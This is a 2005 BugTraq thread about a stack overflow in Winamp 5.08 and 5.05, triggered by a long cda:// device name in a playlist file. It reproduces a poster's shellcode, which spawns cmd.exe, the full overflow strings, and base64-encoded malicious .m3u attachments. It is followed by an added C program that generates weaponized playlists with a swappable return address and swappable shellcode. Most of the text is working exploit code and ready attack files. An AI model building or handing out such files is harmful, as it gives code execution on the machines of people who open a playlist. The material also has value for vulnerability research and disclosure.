BugTraq
Re: Winamp Exploit (POC) 5.08 Stack Overflow Jan 31 2005 12:03AM
Black Dot (blackd0t mail ru)
In-Reply-To: <20050128190411.10755.qmail (at) mail2.securityfocus (dot) com [email concealed]>

Hello!

I have analyzed the vulnerability myself and the information you've given is correct. There are two things, though, that need mentioning.

1. You have given an address where 'jmp esp' command resides. I don't know why, yet, but this address on my computer is 0x5F20546E, so as you can see it's +0x70000 of your address.

2. The arbitrary code which gets executed must be very short, about 210 bytes, because the rest of memory after this length gets overwritten by unknown data.

The vulnerability is exploitable though. If anyone has any ideas, please contact me.

Regards,
Black Dot

>Date: Fri, 28 Jan 2005 20:11:9 +0100
>From: "Rojodos" <rojo2_bugtraq (at) yahoo (dot) es [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed] <bugtraq (at) securityfocus (dot) com [email concealed]>
>Subject: Winamp Exploit (POC) 5.08 Stack Overflow
>
>Hello :)
>
>I've coded an exploit for this vulnerability, using the advisory
> "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name"
> as a guide. The advisory is very good, so it's very easy to code the exploit.
>
>This code:
>
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ\x8b\xe5\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\xb8\x44\x80\xbf\x77\x50\x8d\x5d\xf8\x53\xff\xd0
>
>Should spawn a shell on WinXP SP1 with Winamp 5.08. I have used 0x5f20546e
> in olepro32.dll as the offset, a "jmp esp" (the bytes "nT _").
>
>\x8b\xe5\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\xb8\x44\x80\xbf\x77\x50\x8d\x5d\xf8\x53\xff\xd0
> is the scode in "printable" chars.
>
>I wrote the scode some time ago, on http://foro.elhacker.net. It's a very,
> very simple scode, with a hardcoded system() call (I'm a noob, sorry xD).
>
>I have used AAAABBBBCCCC... to see how big the buffer is, and to see where
> the ret is overflowed (in 5.08 exactly at HIII).
>
>In Winamp 5.05 the same code works, but the ret is "IIII", so the exploit
> must have another "H":
>
> cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ\x8b\xe5\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\xb8\x44\x80\xbf\x77\x50\x8d\x5d\xf8\x53\xff\xd0
>
>Then the exploit works fine in Winamp 5.05 and spawns a shell :)
>
>I have only tested it in 5.08 and 5.05, but I think it's easy to "port" the
> exploit to other versions.
>
>These codes can be saved in an m3u-type file (a Winamp playlist file).
>
>If you copy these codes into a text file like this (Winamp 5.08):
>
>#EXTM3U
>#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
>cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ\x8b\xe5\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\xb8\x44\x80\xbf\x77\x50\x8d\x5d\xf8\x53\xff\xd0
>
>(for example, I have used the "demo" file, DJ Mike Llama, and edited the
> PLAYLIST ENTRY)
>
>and save it as a *.m3u file. If you open this (in this case, I repeat, with
> Winamp 5.08), a cmd shell will appear :)
>
>It's trivial to change the shellcode to make a bindport, reverse shell, etc.
>
>I attach two exploits, one for Winamp 5.08 and the other for Winamp 5.05
> (they are only the special m3u files).
>
>Sorry about my bad English, I'm Spanish :) (Spain exists :D)
>
>Greets to http://www.elhacker.net and http://foro.elhacker.net and all the
> people I know, especially "her" (Isthar) :)
>
>THE REAL ELHACKER.NET! :D
>
>Best regards.
>
>Rojodos
>
>rojo2_bugtraq (at) yahoo (dot) es [email concealed]
>2005-01-28
>
>Attachment: exploit_Winamp-5.05.m3u (base64)
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnRybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhuVCBfSUpKSovlM/9Xg+wExkX4
>Y8ZF+W3GRfpkxkX7LsZF/GXGRf14xkX+ZbhEgL93UI1d+FP/0A0K
>
>Attachment: exploit_Winamp-5.08.m3u (base64)
>
>I0VYVE0zVQ0KI0VYVElORjo1LERKIE1pa2UgTGxhbWEgLSBMbGFtYSBXaGlwcGluJyBJbnRybw0K
>Y2RhOi8vQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISG5UIF9JSkpKi+Uz/1eD7ATGRfhj
>xkX5bcZF+mTGRfsuxkX8ZcZF/XjGRf5luESAv3dQjV34U//QDQo=
>

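The two messages above describe one payload layout: "cda://", filler up to the saved return address (31 bytes in 5.08, 32 in 5.05), a "jmp esp" address written little-endian, four single-byte instructions ("IJJJ") that esp lands on, then the shellcode, all inside a playlist line. Black Dot's two points are exactly the parameters that vary per machine: the trampoline address and how much shellcode fits. The following C program is an added example, not code from Rojodos' post or from Winamp; it rebuilds the posted .m3u files from those parts so the address and shellcode can be swapped. The offsets, the address 0x5F20546E, the "IJJJ" slide and the shellcode bytes (decoded from the base64 attachments) come from the post; the function names, the 210-byte figure treated as a hard limit, and the rule that NUL, CR or LF must not appear in the payload (because the device name is a C string inside a line-oriented playlist) are this example's own assumptions.

```c
/* Added example (not from the post or Winamp): rebuilds Rojodos' .m3u files
 * from their parts so the jmp esp address and shellcode can be swapped.
 * Layout, offsets, address and shellcode bytes are taken from the post above;
 * function names, the bad-byte rule and the hard 210-byte ceiling are
 * assumptions made for this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Black Dot reports ~210 usable shellcode bytes before the stack is
 * overwritten; treated here as a hard limit (assumption). */
#define SCODE_LIMIT 210

/* Rojodos' shellcode, decoded from the base64 attachment: builds "cmd.exe"
 * below ebp and calls a hardcoded msvcrt system() (0x77BF8044, WinXP SP1). */
static const unsigned char SCODE_CMD[] = {
    0x8B, 0xE5,                    /* mov  esp, ebp                   */
    0x33, 0xFF, 0x57,              /* xor  edi, edi ; push edi (NUL)  */
    0x83, 0xEC, 0x04,              /* sub  esp, 4                     */
    0xC6, 0x45, 0xF8, 'c',  0xC6, 0x45, 0xF9, 'm',   /* mov byte [ebp-8..], */
    0xC6, 0x45, 0xFA, 'd',  0xC6, 0x45, 0xFB, '.',   /* one char at a time  */
    0xC6, 0x45, 0xFC, 'e',  0xC6, 0x45, 0xFD, 'x',
    0xC6, 0x45, 0xFE, 'e',
    0xB8, 0x44, 0x80, 0xBF, 0x77,  /* mov  eax, 0x77BF8044 ; system() */
    0x50,                          /* push eax                        */
    0x8D, 0x5D, 0xF8, 0x53,        /* lea  ebx, [ebp-8] ; push ebx    */
    0xFF, 0xD0                     /* call eax                        */
};

/* Saved return address offset inside the cda:// device name:
 * 31 in Winamp 5.08 (pattern "HIII"), 32 in 5.05 (pattern "IIII"). */
size_t ret_offset_for(int version) { return version == 505 ? 32 : 31; }

/* Device name is a C string on a playlist line: NUL, CR or LF truncates it
 * (assumption about the delivery format, not stated in the post). */
static int has_bad_byte(const unsigned char *p, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == '\r' || p[i] == '\n') return 1;
    return 0;
}

/* Writes a complete .m3u into out; returns its length, or 0 if rejected. */
size_t build_m3u(unsigned char *out, size_t cap, size_t ret_off,
                 uint32_t jmp_esp, const unsigned char *sc, size_t sc_len)
{
    static const char hdr[] =
        "#EXTM3U\r\n#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro\r\n";
    static const char scheme[] = "cda://";
    static const char slide[] = "IJJJ"; /* esp lands here after the ret:
                                           dec ecx / dec edx, one byte each */
    unsigned char ret[4];
    size_t n = 0, i;

    ret[0] = (unsigned char)(jmp_esp);         /* little-endian, as "nT _" */
    ret[1] = (unsigned char)(jmp_esp >> 8);
    ret[2] = (unsigned char)(jmp_esp >> 16);
    ret[3] = (unsigned char)(jmp_esp >> 24);

    if (sc_len > SCODE_LIMIT || has_bad_byte(ret, 4) || has_bad_byte(sc, sc_len))
        return 0;
    if (sizeof hdr - 1 + sizeof scheme - 1 + ret_off + 8 + sc_len + 2 > cap)
        return 0;

    memcpy(out + n, hdr, sizeof hdr - 1);       n += sizeof hdr - 1;
    memcpy(out + n, scheme, sizeof scheme - 1); n += sizeof scheme - 1;
    for (i = 0; i < ret_off; i++)               /* AAAABBBB... filler */
        out[n++] = (unsigned char)('A' + i / 4);
    memcpy(out + n, ret, 4);                    n += 4;
    memcpy(out + n, slide, 4);                  n += 4;
    memcpy(out + n, sc, sc_len);                n += sc_len;
    out[n++] = '\r';
    out[n++] = '\n';
    return n;
}

static unsigned char g_buf[512];

/* Rebuilds Rojodos' file for a version with a caller-chosen jmp esp. */
size_t posted_payload(int version, uint32_t jmp_esp)
{
    return build_m3u(g_buf, sizeof g_buf, ret_offset_for(version), jmp_esp,
                     SCODE_CMD, sizeof SCODE_CMD);
}

const unsigned char *payload_bytes(void) { return g_buf; }

/* Probe the shellcode ceiling with a NOP sled of the given length. */
size_t try_shellcode_len(size_t len)
{
    static unsigned char nops[256];
    if (len > sizeof nops) return 0;
    memset(nops, 0x90, len);
    return build_m3u(g_buf, sizeof g_buf, ret_offset_for(508), 0x5F20546Eu,
                     nops, len);
}

/* usage: ./m3u [505|508] [jmp_esp_hex] > exploit.m3u */
int main(int argc, char **argv)
{
    int version = (argc > 1 && strcmp(argv[1], "505") == 0) ? 505 : 508;
    uint32_t addr = argc > 2 ? (uint32_t)strtoul(argv[2], NULL, 16)
                             : 0x5F20546Eu;   /* the post's address */
    size_t n = posted_payload(version, addr);
    if (n == 0) { fputs("rejected: bad byte or shellcode too long\n", stderr); return 1; }
    fwrite(g_buf, 1, n, stdout);
    return 0;
}
```

With the post's address and the 5.08 offset the builder reproduces the attached exploit_Winamp-5.08.m3u byte for byte (152 bytes), and the 5.05 offset reproduces the 153-byte 5.05 file; an address found on another machine, as in Black Dot's case, goes in as the second argument, and any address containing a 0x00, 0x0A or 0x0D byte is refused rather than silently truncated.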
Copyright 2010, SecurityFocus